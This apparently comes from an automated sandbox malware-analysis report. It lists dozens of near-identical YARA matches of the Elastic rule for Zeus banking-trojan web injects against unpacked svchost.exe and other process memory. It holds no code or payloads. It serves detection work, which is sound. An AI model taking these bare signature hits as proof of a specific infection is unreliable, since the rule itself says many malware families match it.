Source: 2.3.svchost.exe.881000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.49.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ca0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29f3c00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.d580000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.a20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11e2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.708de8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.50.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.15b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.49.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3c40000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1552000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11d2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.53.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.fe2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.53.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2672000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.25f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.50.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.47.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29a2000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.d580000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.43.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
